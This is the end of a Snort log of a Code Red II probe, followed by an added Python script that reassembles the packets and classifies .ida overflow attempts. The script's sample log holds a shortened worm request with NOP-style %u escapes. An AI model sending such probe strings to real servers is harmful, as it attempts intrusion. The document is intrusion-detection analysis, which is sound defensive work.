*****R** Seq: 0x55EAC877  Ack: 0x0  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

===============================================================================
Snort processed 10 packets.
Breakdown by protocol:                Action Stats:
    TCP: 10         (100.000%)         ALERTS: 0
    UDP: 0          (0.000%)           LOGGED: 0
   ICMP: 0          (0.000%)           PASSED: 0
    ARP: 0          (0.000%)
   IPv6: 0          (0.000%)
    IPX: 0          (0.000%)
  OTHER: 0          (0.000%)
===============================================================================
Fragmentation Stats:
Fragmented IP Packets: 0          (0.000%)
   Rebuilt IP Packets: 0
   Frag elements used: 0
Discarded(incomplete): 0
   Discarded(timeout): 0
===============================================================================
TCP Stream Reassembly Stats:
   TCP Packets Used:      0          (0.000%)
   Reconstructed Packets: 0          (0.000%)
   Streams Reconstructed: 0
===============================================================================
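The Snort dump above shows everything an analyst needs to reach the verdict in this detect: the client's payload (reassembled across three segments) carries a /default.ida request with an X filler and %u escapes, and the server answers 404 from Apache before the client resets the connection. The Python below is an added example, not part of Wes Bateman's detect or of Snort; it parses the Snort 1.x "-v -d" log layout seen above (IP header line, TCP header line, hex/ASCII dump lines, "=+=+" separators), reassembles each direction by sequence number, normalises %uXXXX escapes, and classifies the exchange. SAMPLE_LOG is constructed from that layout with the X filler and the 404 response shortened; the mapping of an N filler to Code Red v1/v2 and an X filler to Code Red II is the example's own classification heuristic, and the "verdict" strings are invented labels.

```python
"""Reassemble a Snort 1.x packet log and classify an .ida overflow probe.

Added example (not part of the detect). Assumes the Snort "-v -d" log layout:
an IP header line, a TCP header line, hex/ASCII dump lines, "=+=+" separators.
"""
import re
from collections import defaultdict

# Constructed sample in the detect's log layout; filler and response shortened.
SAMPLE_LOG = """\
09/06-13:11:48.406750 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x5EA
65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53685 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x55EAB98D  Ack: 0x47A93138  Win: 0x4470  TcpLen: 20
47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  ?XXXXXXXXXXXXXXX
58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  X%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 3D 61 20 48 54 54 50  bd3%u7801=a HTTP
2F 31 2E 30 0D 0A 0D 0A                          /1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
09/06-13:11:48.467892 8:0:2B:C4:A9:6 -> 0:30:94:E5:D5:E5 type:0x800 len:0x19C
victim.network.11:80 -> 65.42.76.163:1508 TCP TTL:64 TOS:0x0 ID:1700 IpLen:20 DgmLen:398 DF
***AP*** Seq: 0x47A93138  Ack: 0x55EAC877  Win: 0x7D78  TcpLen: 20
48 54 54 50 2F 31 2E 31 20 34 30 34 20 4E 6F 74  HTTP/1.1 404 Not
20 46 6F 75 6E 64 0D 0A 53 65 72 76 65 72 3A 20   Found..Server:
41 70 61 63 68 65 0D 0A 0D 0A                    Apache....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
09/06-13:11:48.507577 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x3C
65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53715 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x55EAC877  Ack: 0x0  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
"""

HEX_LINE = re.compile(r"^((?:[0-9A-F]{2} ){1,16})")          # hex column only
IP_LINE = re.compile(r"^(\S+?):(\d+) -> (\S+?):(\d+) TCP ")
TCP_LINE = re.compile(r"^([*0-9A-Z]{8}) Seq: 0x([0-9A-F]+) ")
UESC = re.compile(r"%u([0-9A-Fa-f]{4})")


def parse_snort_log(text):
    """Return one dict per packet: src, dst, flags, seq and raw payload bytes."""
    packets, cur = [], None
    for line in text.splitlines():
        m = IP_LINE.match(line)
        if m:
            cur = {"src": (m.group(1), int(m.group(2))),
                   "dst": (m.group(3), int(m.group(4))),
                   "flags": "", "seq": 0, "payload": b""}
            packets.append(cur)
            continue
        if cur is None:
            continue
        m = TCP_LINE.match(line)
        if m:
            cur["flags"], cur["seq"] = m.group(1), int(m.group(2), 16)
            continue
        m = HEX_LINE.match(line)
        if m:  # the ASCII column is lossy (dots for non-printables); use the hex
            cur["payload"] += bytes.fromhex(m.group(1))
    return packets


def reassemble(packets):
    """Join payloads per (src, dst) in sequence-number order, so out-of-order
    or retransmitted segments cannot split or duplicate a signature."""
    segs = defaultdict(dict)
    for p in packets:
        if p["payload"]:
            segs[(p["src"], p["dst"])].setdefault(p["seq"], p["payload"])
    return {d: b"".join(s[k] for k in sorted(s)) for d, s in segs.items()}


def decode_u_escapes(s):
    """Expand %uXXXX into the two bytes of the 16-bit code unit (little-endian):
    the normalisation an IDS needs before it can inspect the query string."""
    out, pos = bytearray(), 0
    for m in UESC.finditer(s):
        out += s[pos:m.start()].encode("latin-1")
        out += int(m.group(1), 16).to_bytes(2, "little")
        pos = m.end()
    out += s[pos:].encode("latin-1")
    return bytes(out)


def analyse(text):
    """Is this an .ida overflow probe, which filler does it use, and did the
    server reject it?  Returns a flat report dict."""
    packets = parse_snort_log(text)
    r = {"variant": None, "filler_len": 0, "u_escapes": 0, "binary_query": False,
         "status": None, "server": None, "client_rst": False, "verdict": "no_probe"}
    r["client_rst"] = any("R" in p["flags"] and p["dst"][1] == 80 for p in packets)
    for (src, dst), data in reassemble(packets).items():
        head = data.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
        first = head[0].split(" ")
        if dst[1] == 80 and len(first) >= 2 and first[0] in ("GET", "POST"):
            path, _, query = first[1].partition("?")
            r["u_escapes"] = len(UESC.findall(query))
            if query[:1] and query[:1] in "NX":   # heuristic: worm filler byte
                r["filler_len"] = len(query) - len(query.lstrip(query[0]))
            r["binary_query"] = any(b >= 0x80 for b in decode_u_escapes(query))
            if path.lower().endswith(".ida") and r["u_escapes"] and r["filler_len"]:
                r["variant"] = {"N": "Code Red (v1/v2)", "X": "Code Red II"}[query[0]]
        elif src[1] == 80 and first[0].startswith("HTTP/") and len(first) >= 2:
            r["status"] = int(first[1]) if first[1].isdigit() else None
            for h in head[1:]:
                if h.lower().startswith("server:"):
                    r["server"] = h.split(":", 1)[1].strip()
    if r["variant"]:
        rejected = r["status"] is not None and r["status"] >= 400
        r["verdict"] = "rejected_by_server" if rejected else "investigate_host"
    return r


if __name__ == "__main__":
    for k, v in analyse(SAMPLE_LOG).items():
        print(f"{k:>13}: {v}")
```

Run against the real log, the same code reports a 224-character X filler, a 404 from Apache and a client RST, which is the evidence behind "just another scan": the probe was sent blindly and the target was never an IIS host. A response with a 2xx status from a Microsoft-IIS Server header is the case that deserves the "investigate_host" verdict, because Code Red II drops root.exe and changes the registry on a host it has exploited (the strings are visible in the dump above).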